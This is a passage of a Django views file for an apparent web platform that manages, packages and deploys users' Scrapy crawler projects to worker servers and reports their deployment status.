#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'"""
return settings
@login_required
def main_page(request):
projects = Project.objects.filter(user=request.user)
datasets = Dataset.objects.filter(user=request.user)
userprojects = []
databases = []
for project in projects:
singleproject = {}
singleproject['name'] = project.project_name
userprojects.append(singleproject)
for dataset in datasets:
databases.append(dataset.database)
return render(request, template_name="mainpage.html",
context={'username': request.user.username, 'projects': userprojects, 'databases': databases})
@login_required
def create_new(request):
if request.method == 'GET':
form = CreateProject()
return render(request, 'createproject.html', {'username': request.user.username, 'form': form})
if request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("mainpage"))
elif 'submit' in request.POST:
form = CreateProject(request.POST)
if form.is_valid():
allprojects =[]
userprojects = Project.objects.filter(user=request.user)
for project in userprojects:
allprojects.append(project.project_name)
if form.cleaned_data['projectname'] in allprojects:
errors = form._errors.setdefault("projectname", ErrorList())
errors.append('Project named %s already exists. Please choose another name' % form.cleaned_data['projectname'])
return render(request, 'createproject.html', {'username': request.user.username, 'form': form})
else:
project = Project()
project.project_name = form.cleaned_data['projectname']
project.user = request.user
project.settings_scraper = generate_default_settings()
project.settings_link_generator = generate_default_settings()
project.scraper_function = '''def parse(self, response):\n pass'''
project.link_generator = '''start_urls = [""]\ndef parse(self, response):\n pass'''
project.save()
# project data will be saved in username_projectname database, so we need to
# give the current user ownership of that database
mongodbname = request.user.username + "_" + project.project_name
mongouri = "mongodb://" + settings.MONGODB_USER + ":" + quote(settings.MONGODB_PASSWORD) + "@" + settings.MONGODB_URI + "/admin"
connection = MongoClient(mongouri)
connection.admin.command('grantRolesToUser', request.user.username,
roles=[{'role': 'dbOwner', 'db': mongodbname}])
connection.close()
dataset = Dataset()
dataset.user = request.user
dataset.database = mongodbname
dataset.save()
return HttpResponseRedirect(reverse("manageproject", args=(project.project_name,)))
else:
return render(request, 'createproject.html', {'username': request.user.username, 'form': form})
else:
return HttpResponseNotFound('Nothing is here.')
@login_required
def manage_project(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
projectdata = {}
projectdata['settings_scraper'] = project.settings_scraper
projectdata['settings_link_generator'] = project.settings_link_generator
projectdata['items'] = []
projectdata['pipelines'] = []
if len(project.link_generator) == 0:
projectdata['link_generator'] = False
else:
projectdata['link_generator'] = True
if len(project.scraper_function) == 0:
projectdata['scraper_function'] = False
else:
projectdata['scraper_function'] = True
items = Item.objects.filter(project=project)
pipelines = Pipeline.objects.filter(project=project)
for item in items:
projectdata['items'].append(item)
for pipeline in pipelines:
projectdata['pipelines'].append(pipeline)
return render(request, 'manageproject.html',
{'username': request.user.username, 'project': project.project_name, 'projectdata': projectdata})
@login_required
def delete_project(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'GET':
form = DeleteProject()
return render(request, 'deleteproject.html', {'username': request.user.username, 'form': form, 'projectname': projectname})
if request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("mainpage"))
elif 'submit' in request.POST:
project.delete()
return HttpResponseRedirect(reverse("mainpage"))
else:
return HttpResponseNotFound('Nothing is here.')
@login_required
def create_item(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'GET':
form1 = ItemName()
form2 = FieldName()
return render(request, 'additem.html',
{'username': request.user.username, 'form1': form1, 'form2': form2, 'project': project.project_name})
if request.method == 'POST':
if 'submit' in request.POST:
form1 = ItemName(request.POST)
form2 = FieldName(request.POST, extra=request.POST.get('extra_field_count'))
if form1.is_valid() and form2.is_valid():
item = Item.objects.filter(project=project, item_name=form1.cleaned_data['itemname'])
if len(item):
errors = form1._errors.setdefault("itemname", ErrorList())
errors.append(
'Item named %s already exists. Please choose another name' % form1.cleaned_data['itemname'])
return render(request, 'additem.html',
{'username': request.user.username, 'form1': form1,
'form2': form2, 'project': project.project_name})
allfields =[]
valuetofield = {}
for field in form2.fields:
if form2.cleaned_data[field]:
if field != 'extra_field_count':
valuetofield[form2.cleaned_data[field]] = field
allfields.append(form2.cleaned_data[field])
duplicates = [list(j) for i, j in groupby(allfields)]
for duplicate in duplicates:
if len(duplicate) > 1:
errors = form2._errors.setdefault(valuetofield[duplicate[0]], ErrorList())
errors.append('Duplicate fields are not allowed.')
return render(request, 'additem.html',
{'username': request.user.username, 'form1': form1,
'form2': form2, 'project': project.project_name})
item = Item()
item.item_name = form1.cleaned_data['itemname']
item.project = project
item.save()
for field in allfields:
onefield = Field()
onefield.item = item
onefield.field_name = field
onefield.save()
return HttpResponseRedirect(reverse("listitems", args=(project.project_name,)))
else:
return render(request, 'additem.html',
{'username': request.user.username, 'form1': form1,
'form2': form2, 'project': project.project_name})
elif 'cancel' in request.POST:
return HttpResponseRedirect(reverse("listitems", args=(project.project_name,)))
else:
form1 = ItemName(request.POST)
form2 = FieldName(request.POST, extra=request.POST.get('extra_field_count'))
return render(request, 'additem.html',
{'username': request.user.username, 'form1': form1,
'form2': form2, 'project': project.project_name})
@login_required
def itemslist(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
itemtracker = 0
items = Item.objects.filter(project=project)
itemdata = []
for item in items:
itemdata.append([])
itemdata[itemtracker].append(item.item_name)
fields = Field.objects.filter(item=item)
if fields:
itemdata[itemtracker].append([])
for field in fields:
itemdata[itemtracker][1].append(field.field_name)
itemtracker += 1
return render(request, 'itemslist.html',
{'username': request.user.username, 'project': project.project_name, 'items': itemdata})
@login_required
def deleteitem(request, projectname, itemname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
try:
item = Item.objects.get(project=project, item_name=itemname)
except Item.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'GET':
# using the form that was used for deleting the project
form = DeleteProject()
return render(request, 'deleteitem.html',
{'username': request.user.username, 'form': form, 'projectname': projectname, 'itemname': itemname})
elif request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("listitems", args=(projectname,)))
elif 'submit' in request.POST:
item.delete()
return HttpResponseRedirect(reverse("listitems", args=(projectname,)))
@login_required
def edititem(request, projectname, itemname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
try:
item = Item.objects.get(project=project, item_name=itemname)
except Item.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'GET':
fields = Field.objects.filter(item=item)
fieldcounter = 0
fieldlist = []
fielddata = {}
for field in fields:
fieldlist.append(field.field_name)
fieldcounter += 1
if fieldcounter == 1:
fielddata['fieldname'] = fieldlist[0]
fielddata['extra_field_count'] = 0
elif fieldcounter > 1:
fielddata['fieldname'] = fieldlist[0]
fielddata['extra_field_count'] = fieldcounter - 1
for i in range(1,fieldcounter):
fielddata['field_%d' % (i+1)] = fieldlist[i]
form1 = ItemName({'itemname': itemname})
form2 = FieldName(initial=fielddata, extra=fielddata['extra_field_count'])
return render(request, 'edititem.html',
{'username': request.user.username, 'form1': form1, 'form2': form2, 'project': project.project_name})
elif request.method == 'POST':
if 'submit' in request.POST:
form1 = ItemName(request.POST)
form2 = FieldName(request.POST, extra=request.POST.get('extra_field_count'))
if form1.is_valid() and form2.is_valid():
newitemname = Item.objects.filter(project=project, item_name=form1.cleaned_data['itemname'])
if len(newitemname):
for oneitem in newitemname:
if oneitem.item_name != item.item_name:
errors = form1._errors.setdefault('itemname', ErrorList())
errors.append('Item named %s already exists. Please choose another name' % form1.cleaned_data['itemname'])
return render(request, 'edititem.html',
{'username': request.user.username, 'form1': form1,
'form2': form2, 'project': project.project_name})
allfields = []
valuetofield = {}
for field in form2.fields:
if form2.cleaned_data[field]:
if field != 'extra_field_count':
valuetofield[form2.cleaned_data[field]] = field
allfields.append(form2.cleaned_data[field])
duplicates = [list(j) for i, j in groupby(allfields)]
for duplicate in duplicates:
if len(duplicate) > 1:
errors = form2._errors.setdefault(valuetofield[duplicate[0]], ErrorList())
errors.append('Duplicate fields are not allowed.')
return render(request, 'edititem.html',
{'username': request.user.username, 'form1': form1,
'form2': form2, 'project': project.project_name})
deletefield = Field.objects.filter(item=item)
for field in deletefield:
field.delete()
item.item_name = form1.cleaned_data['itemname']
item.save()
for field in allfields:
onefield = Field()
onefield.item = item
onefield.field_name = field
onefield.save()
return HttpResponseRedirect(reverse("listitems", args=(project.project_name,)))
elif 'cancel' in request.POST:
return HttpResponseRedirect(reverse("listitems", args=(project.project_name,)))
else:
form1 = ItemName(request.POST)
form2 = FieldName(request.POST, extra=request.POST.get('extra_field_count'))
return render(request, 'edititem.html',
{'username': request.user.username, 'form1': form1,
'form2': form2, 'project': project.project_name})
@login_required
def addpipeline(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
defined_items = {}
items = Item.objects.filter(project=project)
for item in items:
defined_items[item.item_name] = []
fields = Field.objects.filter(item=item)
for field in fields:
defined_items[item.item_name].append(field.field_name)
if request.method == 'GET':
initial_code = '''def process_item(self, item, spider):\n return item
'''
form = CreatePipeline(initial={'pipelinefunction': initial_code})
return render(request, "addpipeline.html",
{'username': request.user.username, 'form': form, 'project': project.project_name, 'items': defined_items})
elif request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("listpipelines", args=(project.project_name,)))
if 'submit' in request.POST:
form = CreatePipeline(request.POST)
if form.is_valid():
names = []
orders =[]
pipelines = Pipeline.objects.filter(project=project)
for pipeline in pipelines:
names.append(pipeline.pipeline_name)
orders.append(pipeline.pipeline_order)
if form.cleaned_data['pipelinename'] in names:
errors = form._errors.setdefault('pipelinename', ErrorList())
errors.append(
'Pipeline named %s already exists. Please choose another name' % form.cleaned_data['pipelinename'])
return render(request, "addpipeline.html",
{'username': request.user.username, 'form': form, 'project': project.project_name, 'items': defined_items})
if int(form.cleaned_data['pipelineorder']) in orders:
errors = form._errors.setdefault('pipelineorder', ErrorList())
errors.append(
'Pipeline order %s already exists for another pipeline function. Enter a different order' % form.cleaned_data['pipelineorder'])
return render(request, "addpipeline.html",
{'username': request.user.username, 'form': form, 'project': project.project_name, 'items': defined_items})
pipeline = Pipeline()
pipeline.pipeline_name = form.cleaned_data['pipelinename']
pipeline.pipeline_order = form.cleaned_data['pipelineorder']
pipeline.pipeline_function = form.cleaned_data['pipelinefunction']
pipeline.project = project
pipeline.save()
return HttpResponseRedirect(reverse("listpipelines", args=(project.project_name,)))
else:
return render(request, "addpipeline.html",
{'username': request.user.username, 'form': form, 'project': project.project_name, 'items': defined_items})
@login_required
def pipelinelist(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
itemtracker = 0
pipelines = Pipeline.objects.filter(project=project)
pipelinedata = []
for pipeline in pipelines:
pipelinedata.append([])
pipelinedata[itemtracker].append(pipeline.pipeline_name)
pipelinedata[itemtracker].append(pipeline.pipeline_order)
itemtracker += 1
return render(request, 'pipelinelist.html', {'username': request.user.username, 'project': project.project_name, 'items': pipelinedata})
@login_required
def editpipeline(request, projectname, pipelinename):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
try:
pipeline = Pipeline.objects.get(project=project, pipeline_name=pipelinename)
except Pipeline.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
defined_items = {}
items = Item.objects.filter(project=project)
for item in items:
defined_items[item.item_name] = []
fields = Field.objects.filter(item=item)
for field in fields:
defined_items[item.item_name].append(field.field_name)
if request.method == 'GET':
form = CreatePipeline(initial={'pipelinename': pipeline.pipeline_name,
'pipelineorder': pipeline.pipeline_order,
'pipelinefunction': pipeline.pipeline_function})
return render(request, "editpipeline.html",
{'username': request.user.username, 'form': form, 'project': project.project_name, 'items': defined_items})
elif request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("listpipelines", args=(project.project_name,)))
if 'submit' in request.POST:
form = CreatePipeline(request.POST)
if form.is_valid():
newpipelinename = Pipeline.objects.filter(project=project, pipeline_name=form.cleaned_data['pipelinename'])
if len(newpipelinename):
for oneitem in newpipelinename:
if oneitem.pipeline_name != pipeline.pipeline_name:
errors = form._errors.setdefault('pipelinename', ErrorList())
errors.append(
'Pipeline named %s already exists. Please choose another name' % form.cleaned_data[
'pipelinename'])
return render(request, 'editpipeline.html',
{'username': request.user.username, 'form': form, 'project': project.project_name, 'items': defined_items})
newpipelineorder = Pipeline.objects.filter(project=project,
pipeline_order=form.cleaned_data['pipelineorder'])
if len(newpipelineorder):
for oneitem in newpipelineorder:
if oneitem.pipeline_order != pipeline.pipeline_order:
errors = form._errors.setdefault('pipelineorder', ErrorList())
errors.append(
'Pipeline order %s already exists for another pipeline function. Enter a different order' % form.cleaned_data['pipelineorder'])
return render(request, 'editpipeline.html',
{'username': request.user.username, 'form': form, 'project': project.project_name, 'items': defined_items})
pipeline.pipeline_name = form.cleaned_data['pipelinename']
pipeline.pipeline_order = form.cleaned_data['pipelineorder']
pipeline.pipeline_function = form.cleaned_data['pipelinefunction']
pipeline.save()
return HttpResponseRedirect(reverse("listpipelines", args=(project.project_name,)))
else:
return render(request, "editpipeline.html",
{'username': request.user.username, 'form': form, 'project': project.project_name, 'items': defined_items})
@login_required
def deletepipeline(request, projectname, pipelinename):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
try:
pipeline = Pipeline.objects.get(project=project, pipeline_name=pipelinename)
except Pipeline.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'GET':
form = DeleteProject()
return render(request, 'deletepipeline.html',
{'username': request.user.username,
'form': form, 'projectname': project.project_name, 'pipelinename': pipeline.pipeline_name})
elif request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("listpipelines", args=(project.project_name,)))
elif 'submit' in request.POST:
pipeline.delete()
return HttpResponseRedirect(reverse("listpipelines", args=(project.project_name,)))
@login_required
def linkgenerator(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
spiderclassnamelabel = "class " + request.user.username.title() + project.project_name.title() + "Spider:"
if request.method == 'GET':
form = LinkGenerator(initial={'function': project.link_generator})
form.fields['function'].label = spiderclassnamelabel
return render(request,
'addlinkgenerator.html', {'username': request.user.username,
'form': form, 'project': project.project_name})
elif request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("manageproject", args=(project.project_name,)))
if 'submit' in request.POST:
form = LinkGenerator(request.POST)
form.fields['function'].label = spiderclassnamelabel
if form.is_valid():
project.link_generator = form.cleaned_data['function']
project.save()
return HttpResponseRedirect(reverse("manageproject", args=(project.project_name,)))
else:
return render(request, 'addlinkgenerator.html',
{'username': request.user.username, 'form': form, 'project': project.project_name})
@login_required
def scraper(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
spiderclassnamelabel = "class " + request.user.username.title() + project.project_name.title() + "Spider:"
if request.method == 'GET':
form = Scraper(initial={'function': project.scraper_function})
form.fields['function'].label = spiderclassnamelabel
return render(request, 'addscraper.html', {'username': request.user.username, 'form': form, 'project': project.project_name})
elif request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("manageproject", args=(projectname,)))
if 'submit' in request.POST:
form = Scraper(request.POST)
form.fields['function'].label = spiderclassnamelabel
if form.is_valid():
project.scraper_function = form.cleaned_data['function']
project.save()
return HttpResponseRedirect(reverse("manageproject", args=(projectname,)))
else:
return render(request, 'addscraper.html',
{'username': request.user.username, 'form': form, 'project': project.project_name})
def create_folder_tree(tree):
d = os.path.abspath(tree)
if not os.path.exists(d):
os.makedirs(d)
else:
shutil.rmtree(d)
os.makedirs(d)
@login_required
def change_password(request):
if request.method == 'POST':
form = ChangePass(request.user, request.POST)
if form.is_valid():
user = form.save()
update_session_auth_hash(request, user)
mongodb_user_password_change(request.user.username, form.cleaned_data['new_password1'])
if settings.LINUX_USER_CREATION_ENABLED:
try:
linux_user_pass_change(request.user.username, form.cleaned_data['new_password1'])
except:
pass
return HttpResponseRedirect(reverse("mainpage"))
else:
return render(request, 'changepassword.html', {
'username': request.user.username,
'form': form
})
else:
form = ChangePass(request.user)
return render(request, 'changepassword.html', {
'username': request.user.username,
'form': form
})
@login_required
def deploy(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
projectitems = Item.objects.filter(project=project)
projectlinkgenfunction = project.link_generator
projectscraperfunction = project.scraper_function
if not projectitems or not projectlinkgenfunction or not projectscraperfunction:
return HttpResponseNotFound('Not all required project parts are present for deployment. Please review your project and deploy again.')
basepath = os.path.dirname(os.path.abspath(__file__))
#we are giving a project and its folders a unique name on disk, so that no name conflicts occur when deploying the projects
projectnameonfile = request.user.username + '_' + projectname
#removing the project folder, if exists
create_folder_tree(basepath + "/projects/%s/%s" % (request.user.username, projectname))
#Create project folder structure
folder1 = basepath + "/projects/%s/%s/%s/%s/%s" % (request.user.username, projectname, 'scraper', projectnameonfile, 'spiders')
folder2 = basepath + "/projects/%s/%s/%s/%s/%s" % (request.user.username, projectname, 'linkgenerator', projectnameonfile, 'spiders')
#Link generator folders
linkgenouterfolder = basepath + "/projects/%s/%s/%s" % (request.user.username, projectname, 'linkgenerator')
linkgenprojectfolder = basepath + "/projects/%s/%s/%s/%s" % (request.user.username, projectname, 'linkgenerator', projectnameonfile)
linkgenspiderfolder = basepath + "/projects/%s/%s/%s/%s/%s" % (request.user.username, projectname, 'linkgenerator', projectnameonfile, 'spiders')
#Scraper folders
scraperouterfolder = basepath + "/projects/%s/%s/%s" % (request.user.username, projectname, 'scraper')
scraperprojectfolder = basepath + "/projects/%s/%s/%s/%s" % (request.user.username, projectname, 'scraper', projectnameonfile)
scraperspiderfolder = basepath + "/projects/%s/%s/%s/%s/%s" % (request.user.username, projectname, 'scraper', projectnameonfile, 'spiders')
#Link generator files
linkgencfgfile = linkgenouterfolder + "/scrapy.cfg"
linkgensettingsfile = linkgenprojectfolder + "/settings.py"
linkgenspiderfile = linkgenspiderfolder + "/%s_%s.py" % (request.user.username, projectname)
#Scraper files
scrapercfgfile = scraperouterfolder + "/scrapy.cfg"
scrapersettingsfile = scraperprojectfolder + "/settings.py"
scraperspiderfile = scraperspiderfolder + "/%s_%s.py" % (request.user.username, projectname)
scraperitemsfile = scraperprojectfolder + "/items.py"
scraperpipelinefile = scraperprojectfolder + "/pipelines.py"
#Create needed folders
create_folder_tree(folder1)
create_folder_tree(folder2)
#putting __init.py__ files in linkgenerator
shutil.copy(basepath + '/scrapy_packages/__init__.py', linkgenprojectfolder)
shutil.copy(basepath + '/scrapy_packages/__init__.py', linkgenspiderfolder)
#putting rabbitmq folder alongside project
shutil.copytree(basepath + '/scrapy_packages/rabbitmq', linkgenprojectfolder + '/rabbitmq')
#creating a cfg for link generator
scrapycfg = '''[settings]\n
default = %s.settings
[deploy:linkgenerator]
url = %s
project = %s
''' % (projectnameonfile, settings.LINK_GENERATOR, projectnameonfile)
with open(linkgencfgfile, 'w') as f:
f.write(scrapycfg)
#creating a settings.py file for link generator
with open(basepath + '/scrapy_templates/settings.py.tmpl', 'r') as f:
settingspy = Template(f.read()).substitute(project_name=projectnameonfile)
settingspy += '\n' + project.settings_link_generator
settingspy += '\nSCHEDULER = "%s"' % (projectnameonfile + settings.SCHEDULER)
settingspy += '\nSCHEDULER_PERSIST = %s' % settings.SCHEDULER_PERSIST
settingspy += '\nRABBITMQ_HOST = "%s"' % settings.RABBITMQ_HOST
settingspy += '\nRABBITMQ_PORT = %s' % settings.RABBITMQ_PORT
settingspy += '\nRABBITMQ_USERNAME = "%s"' % settings.RABBITMQ_USERNAME
settingspy += '\nRABBITMQ_PASSWORD = "%s"' % settings.RABBITMQ_PASSWORD
with open(linkgensettingsfile, 'w') as f:
f.write(settingspy)
#creating a spider file for link generator
with open(basepath + '/scrapy_templates/linkgenspider.py.tmpl', 'r') as f:
spider = Template(f.read()).substitute(spider_name=request.user.username + "_" + projectname, SpiderClassName=request.user.username.title() + projectname.title() + "Spider")
spider += '\n'
linkgenlines = project.link_generator.splitlines()
for lines in linkgenlines:
spider += ' ' + lines + '\n'
with open(linkgenspiderfile, 'w') as f:
f.write(spider)
# putting __init.py__ files in scraper
shutil.copy(basepath + '/scrapy_packages/__init__.py', scraperprojectfolder)
shutil.copy(basepath + '/scrapy_packages/__init__.py', scraperspiderfolder)
# putting rabbitmq folder alongside project
shutil.copytree(basepath + '/scrapy_packages/rabbitmq', scraperprojectfolder + '/rabbitmq')
# putting mongodb folder alongside project
shutil.copytree(basepath + '/scrapy_packages/mongodb', scraperprojectfolder + '/mongodb')
# creating a cfg for scraper
scrapycfg = '''[settings]\n
default = %s.settings\n\n''' % (projectnameonfile)
workercount = 1
for worker in settings.SCRAPERS:
scrapycfg += '[deploy:worker%d]\nurl = %s\n' % (workercount, worker)
workercount += 1
scrapycfg += '\nproject = %s' % (projectnameonfile)
with open(scrapercfgfile, 'w') as f:
f.write(scrapycfg)
# creating a spider file for scraper
with open(basepath + '/scrapy_templates/scraperspider.py.tmpl', 'r') as f:
spider = Template(f.read()).substitute(spider_name=request.user.username + "_" + projectname,
SpiderClassName=request.user.username.title() + projectname.title() + "Spider",
project_name=projectnameonfile)
spider += '\n'
scraperlines = project.scraper_function.splitlines()
for lines in scraperlines:
spider += ' ' + lines + '\n'
with open(scraperspiderfile, 'w') as f:
f.write(spider)
#creating items file for scraper
items = Item.objects.filter(project=project)
itemsfile = 'import scrapy\n'
fieldtemplate = ' %s = scrapy.Field()\n'
for item in items:
itemsfile += 'class %s(scrapy.Item):\n' % item.item_name
fields = Field.objects.filter(item=item)
for field in fields:
itemsfile += fieldtemplate % field.field_name
itemsfile += fieldtemplate % 'ack_signal'
itemsfile += '\n'
with open(scraperitemsfile, 'w') as f:
f.write(itemsfile)
#creating pipelines file for scraper
pipelinesfile = ''
pipelinedict = {}
pipelines = Pipeline.objects.filter(project=project)
for pipeline in pipelines:
pipelinedict[pipeline.pipeline_name] = pipeline.pipeline_order
pipelinesfile += 'class %s(object):\n' % pipeline.pipeline_name
pipfunctionlines = pipeline.pipeline_function.splitlines()
for lines in pipfunctionlines:
pipelinesfile += ' ' + lines + '\n'
with open(scraperpipelinefile, 'w') as f:
f.write(pipelinesfile)
# creating a settings.py file for scraper
with open(basepath + '/scrapy_templates/settings.py.tmpl', 'r') as f:
settingspy = Template(f.read()).substitute(project_name=projectnameonfile)
settingspy += '\n' + project.settings_scraper
settingspy += '\nSCHEDULER = "%s"' % (projectnameonfile + settings.SCHEDULER)
settingspy += '\nSCHEDULER_PERSIST = %s' % settings.SCHEDULER_PERSIST
settingspy += '\nRABBITMQ_HOST = "%s"' % settings.RABBITMQ_HOST
settingspy += '\nRABBITMQ_PORT = %s' % settings.RABBITMQ_PORT
settingspy += '\nRABBITMQ_USERNAME = "%s"' % settings.RABBITMQ_USERNAME
settingspy += '\nRABBITMQ_PASSWORD = "%s"' % settings.RABBITMQ_PASSWORD
settingspy += '\nMONGODB_URI = "%s"' % settings.MONGODB_URI
settingspy += '\nMONGODB_SHARDED = %s' % settings.MONGODB_SHARDED
settingspy += '\nMONGODB_BUFFER_DATA = %s' % settings.MONGODB_BUFFER_DATA
settingspy += '\nMONGODB_USER = "%s"' % settings.MONGODB_USER
settingspy += '\nMONGODB_PASSWORD = "%s"' % settings.MONGODB_PASSWORD
settingspy += '\nITEM_PIPELINES = { "%s.mongodb.scrapy_mongodb.MongoDBPipeline": 999, \n' % projectnameonfile
for key in pipelinedict:
settingspy += '"%s.pipelines.%s": %s, \n' % (projectnameonfile, key, pipelinedict[key])
settingspy += '}'
with open(scrapersettingsfile, 'w') as f:
f.write(settingspy)
#putting setup.py files in appropriate folders
with open(basepath + '/scrapy_templates/setup.py', 'r') as f:
setuppy = Template(f.read()).substitute(projectname=projectnameonfile)
with open(linkgenouterfolder + '/setup.py', 'w') as f:
f.write(setuppy)
with open(scraperouterfolder + '/setup.py', 'w') as f:
f.write(setuppy)
class cd:
"""Context manager for changing the current working directory"""
def __init__(self, newPath):
self.newPath = os.path.expanduser(newPath)
def __enter__(self):
self.savedPath = os.getcwd()
os.chdir(self.newPath)
def __exit__(self, etype, value, traceback):
os.chdir(self.savedPath)
with cd(linkgenouterfolder):
os.system("python setup.py bdist_egg")
with cd(scraperouterfolder):
os.system("python setup.py bdist_egg")
linkgeneggfile = glob.glob(linkgenouterfolder + "/dist/*.egg")
scrapereggfile = glob.glob(scraperouterfolder + "/dist/*.egg")
linkgenlastdeploy = LinkgenDeploy.objects.filter(project=project).order_by('-version')[:1]
if linkgenlastdeploy:
linkgenlastdeploy = linkgenlastdeploy[0].version
else:
linkgenlastdeploy = 0
scraperslastdeploy = ScrapersDeploy.objects.filter(project=project).order_by('-version')[:1]
if scraperslastdeploy:
scraperslastdeploy = scraperslastdeploy[0].version
else:
scraperslastdeploy = 0
try:
with open(linkgeneggfile[0], 'rb') as f:
files = {'egg': f}
payload = {'project': '%s' % (projectnameonfile), 'version': (linkgenlastdeploy + 1)}
r = requests.post('%s/addversion.json' % settings.LINK_GENERATOR, data=payload, files=files, timeout=(3, None))
result = r.json()
deploylinkgen = LinkgenDeploy()
deploylinkgen.project = project
deploylinkgen.version = linkgenlastdeploy + 1
if result["status"] != "ok":
deploylinkgen.success = False
else:
deploylinkgen.success = True
deploylinkgen.save()
except:
deploylinkgen = LinkgenDeploy()
deploylinkgen.project = project
deploylinkgen.version = linkgenlastdeploy + 1
deploylinkgen.success = False
deploylinkgen.save()
with open(scrapereggfile[0], 'rb') as f:
eggfile = f.read()
files = {'egg' : eggfile}
payload = {'project': '%s' % (projectnameonfile), 'version': (scraperslastdeploy + 1)}
deployscraper = ScrapersDeploy()
deployscraper.project = project
deployscraper.version = scraperslastdeploy + 1
deployedscraperslist = []
scrapercounter = 1
for onescraper in settings.SCRAPERS:
try:
r = requests.post('%s/addversion.json' % onescraper, data=payload, files=files, timeout=(3, None))
result = r.json()
if result['status'] == 'ok':
deployedscraperslist.append("worker%s" %scrapercounter)
except:
pass
scrapercounter += 1
deployscraper.success = json.dumps(deployedscraperslist)
deployscraper.save()
return HttpResponseRedirect(reverse('deploystatus', args=(projectname,)))
@login_required
def deployment_status(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
workers = []
counter = 1
workers.append({'name': 'linkgenerator', 'status': 'Loading...', 'version': 'Loading...'})
for worker in settings.SCRAPERS:
workers.append({'name': 'worker%s' % counter, 'status': 'Loading...', 'version': 'Loading...'})
counter += 1
return render(request, "deployment_status.html", {'project': projectname, 'username': request.user.username, 'workers': workers})
@login_required
def get_project_status_from_all_workers(request, projectname):
uniqueprojectname = request.user.username + '_' + projectname
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
counter = 1
if request.method == 'POST':
allworkers = []
workerstatus = {}
workerstatus['name'] = 'linkgenerator'
try:
r = requests.get('%s/listprojects.json' % settings.LINK_GENERATOR,timeout=(3, None))
result = r.json()
if uniqueprojectname in result['projects']:
workerstatus['status'] = 'ready'
try:
q = requests.get('%s/listversions.json' % settings.LINK_GENERATOR, params={'project': uniqueprojectname},timeout=(3, None))
qresult = q.json()
version = qresult['versions'][-1]
workerstatus['version'] = version
except:
workerstatus['version'] = 'unknown'
try:
s = requests.get('%s/listjobs.json' % settings.LINK_GENERATOR, params={'project': uniqueprojectname}, timeout=(3, None))
sresult = s.json()
if sresult['finished']:
workerstatus['status'] = 'finished'
if sresult['pending']:
workerstatus['status'] = 'pending'
if sresult['running']:
workerstatus['status'] = 'running'
except:
workerstatus['status'] = 'unknown'
else:
workerstatus['status'] = 'not delpoyed'
workerstatus['version'] = 'unknown'
except:
workerstatus['status'] = 'unreachable'
workerstatus['version'] = 'unknown'
allworkers.append(workerstatus)
for worker in settings.SCRAPERS:
workerstatus = {}
workerstatus['name'] = 'worker%s' % counter
try:
r = requests.get('%s/listprojects.json' % worker, timeout=(3, None))
result = r.json()
if uniqueprojectname in result['projects']:
workerstatus['status'] = 'ready'
try:
q = requests.get('%s/listversions.json' % worker,
params={'project': uniqueprojectname}, timeout=(3, None))
qresult = q.json()
version = qresult['versions'][-1]
workerstatus['version'] = version
except:
workerstatus['version'] = 'unknown'
try:
s = requests.get('%s/listjobs.json' % worker,
params={'project': uniqueprojectname}, timeout=(3, None))
sresult = s.json()
if sresult['finished']:
workerstatus['status'] = 'finished'
if sresult['pending']:
workerstatus['status'] = 'pending'
if sresult['running']:
workerstatus['status'] = 'running'
except:
workerstatus['status'] = 'unknown'
else:
